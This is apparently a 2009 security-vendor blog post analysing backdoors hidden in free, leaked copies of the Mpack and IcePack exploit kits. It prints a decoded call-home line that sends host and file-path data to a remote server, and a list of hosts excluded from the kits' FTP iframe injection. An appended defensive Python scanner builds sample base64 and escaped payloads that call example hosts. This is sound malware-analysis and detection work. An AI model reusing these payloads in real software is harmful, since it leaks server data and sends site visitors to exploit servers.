
Honor Among Thieves?

Updated: 29 Jun 2009
Liam O Murchu

The Mpack and IcePack exploit packages have been on sale for some time. Now, free releases of these tools are being distributed, but are these free distributions all they are supposed to be? While examining these free releases we discovered some surprises.

The Mpack and IcePack exploit packages are designed for non-technical users. They group exploits together into one easy-to-install package, and using this package, non-technical users can run exploits on the browsers of unsuspecting visitors. Ultimately this grants non-technical attackers the ability to infect visitors to their sites without having to know how exactly it happens.

When these packs were first released they sold in the underground for over $1,000 apiece. The packs are installed with minimum configuration and effort, and all that the controller needs to do is attract users to the exploit site. When one of these exploit sites is opened in a visitor's browser, the exploits are run and, if the user is vulnerable, malware of the controller's choice will be run on the visitor's machine.

However, somewhere along the line the code for the original packs was leaked and people started to distribute it for free or for vastly reduced prices. These packs are now being distributed freely in hacking forums. We tested two of these packs in the lab and found some surprises. The packs that are being distributed freely contain a backdoor (or two). These free packs are fully functional and allow whoever installs them to infect visitors to their page just as would be expected. However, the packs also contain extra code that will silently direct the visitor to an additional exploit server. This additional server is hosted in Russia and in one example was still live when tested recently, even though these "backdoored" packs have been available for a few months now.

The result of all of this is that whenever a hacker installs one of these free packs and starts attracting visitors to it, he is also unknowingly attracting visitors to the Russian exploit site. So this Russian site is getting free visitors from every install of these packs - a sort of commission, as it were!

With the free Mpack exploit pack there are two backdoors included. The two backdoors are placed in different files within the pack and would be difficult to find without being very familiar with the Mpack code. Both are encoded in JavaScript. Obviously we will not include the exact code from the pack here—that would make it far too easy for script kiddies to remove it. Instead we show how the code looks when it is "un-escaped" / decoded:

This eventually leads to an iframe tag being added to the visitor's page, redirecting them to the Russian Mpack server. We have also observed what appears to have been a backdoor within the free IcePack code. This backdoor is encoded in base64, so it stands out a little more in the code and thus is easier to spot; however, it is appended at the end of a long line of unrelated code, so unless you scroll all the way to the right it might be missed. Again, displayed here is the result of decoding the original line of code:

file_get_contents('http://[removed].in/c.php?host=' . $_SERVER['HTTP_HOST'] . '&root=' . $_SERVER['SCRIPT_FILENAME']);

This server is not returning anything interesting at the moment, so it is hard to tell what exactly its function is. Perhaps it was used to track the number of installations? However, from where it is placed and from the way it is encoded, we have no doubt that this code is up to no good.
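As an added, defender-side example (not code from either pack or from the original post), the following Python scanner pulls apart both hiding places described above: quoted strings built from %XX / \xXX escapes, as used by the Mpack JavaScript backdoors, and base64 runs sitting at the far right of a long line, as used by the IcePack call-home. The sample input is constructed inline with example.invalid hostnames; the indicator list and the length thresholds are assumptions, not values from the packs.

```python
"""Added example: find encoded payloads hidden in long source lines.

Covers the two hiding techniques discussed in the post: JavaScript that is
%-escaped (reversed with unescape()) and a base64 blob tacked onto the end
of a long, unrelated line. Sample input is constructed here, not taken from
either pack; hostnames use the reserved .invalid TLD.
"""
import base64
import binascii
import re
import urllib.parse

# Substrings that, once decoded, justify a closer look at the line (assumed list).
INDICATORS = ("<iframe", "file_get_contents(", "$_SERVER", "http://",
              "https://", "document.write", "eval(")

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")            # long unbroken base64-alphabet run
STRING_LIT = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")  # quoted literal, either quote style
JS_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}")  # one %XX or \xXX escape
HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_js_escapes(s):
    """Reverse JavaScript-style escaping: \\xXX first, then %XX (what unescape() does)."""
    s = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)
    return urllib.parse.unquote(s)


def decode_base64_blob(blob):
    """Return decoded text if blob is valid base64 of printable ASCII, else None."""
    if len(blob) % 4:
        return None
    try:
        text = base64.b64decode(blob, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None  # random alphanumeric runs decode to garbage, not to code
    return text


def indicators_in(text):
    low = text.lower()
    return [i for i in INDICATORS if i.lower() in low]


def scan_source(text):
    """Return (line_no, column, encoding, decoded, indicators) for each suspicious blob."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        # 1. base64 runs anywhere on the line, including far past normal screen width
        for m in B64_RUN.finditer(line):
            decoded = decode_base64_blob(m.group(0))
            hits = indicators_in(decoded) if decoded else []
            if hits:
                findings.append((line_no, m.start(), "base64", decoded, hits))
        # 2. string literals made largely of %XX / \xXX escapes
        for m in STRING_LIT.finditer(line):
            body = m.group(2)
            if len(JS_ESCAPE.findall(body)) < 4:
                continue
            decoded = decode_js_escapes(body)
            hits = indicators_in(decoded)
            if hits:
                findings.append((line_no, m.start(2), "js-escape", decoded, hits))
    return findings


# Constructed sample (hypothetical pack files, not real Mpack/IcePack code).
IFRAME_JS = '<iframe src="http://example.invalid/in.php" width=0 height=0></iframe>'
CALLBACK_PHP = ("file_get_contents('http://example.invalid/c.php?host=' "
                ". $_SERVER['HTTP_HOST']);")
PADDING = "$n = ($n + 1) % 7; " * 20          # boring code pushing the blob off-screen
SAMPLE = (
    "<?php\n"
    "$cfg = array('exploits' => 12, 'stats' => true);\n"
    'document.write(unescape("' + urllib.parse.quote(IFRAME_JS, safe="") + '"));\n'
    + PADDING + "eval(base64_decode('"
    + base64.b64encode(CALLBACK_PHP.encode()).decode() + "'));\n"
)

if __name__ == "__main__":
    for line_no, col, enc, decoded, hits in scan_source(SAMPLE):
        print(f"line {line_no} col {col} [{enc}] {hits}\n    {decoded}")
```

Run as a script it reports the iframe string on line 3 and the call-home on line 4 at column 400, which is the point of reporting the column: a blob that starts hundreds of characters into a line is exactly what a reviewer scrolling a normal editor window would miss.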

Another interesting line of code taken from the free IcePack code is a list of servers where the distributors would prefer you not to add iframes. IcePack contains an FTP checker script that can log in to legitimate FTP servers in order to add a redirect to an exploit server (normally achieved by adding an iframe tag). Before logging in to an FTP server, the IcePack code first checks if the Web site is on the banned list, shown below, and if it is, it blocks the login attempt:

$bad_hosts = array('boom.ru', 'narod.ru', 'jino-net.ru', 'fatal.ru', 'h10.ru', 'h11.ru', 'h12.ru', 'h13.ru', 'h14.ru', 'h15.ru', 'h16.ru', '110mb.com', 'by.ru', 'tripod.com');

This $bad_hosts list shows sites where the people who released this free IcePack code would prefer you not to put iframes. Perhaps these are sites they use or control, but it’s not surprising that most of these sites are Russian (both Mpack and IcePack are coded by Russian groups).

Since we have not purchased the real versions of these packs we cannot say for certain that any / all of the code mentioned here is not included in the real version of these packs. It just goes to show that the same caution is needed in the underground as in the real world; caveat emptor. As for the free versions of these packs, if something looks too good to be true, it probably is. All of the exploits contained in these free exploit packs are detected by Symantec products with the latest definitions.

Message Edited by Trevor Mack on 04-09-2009 07:10 AM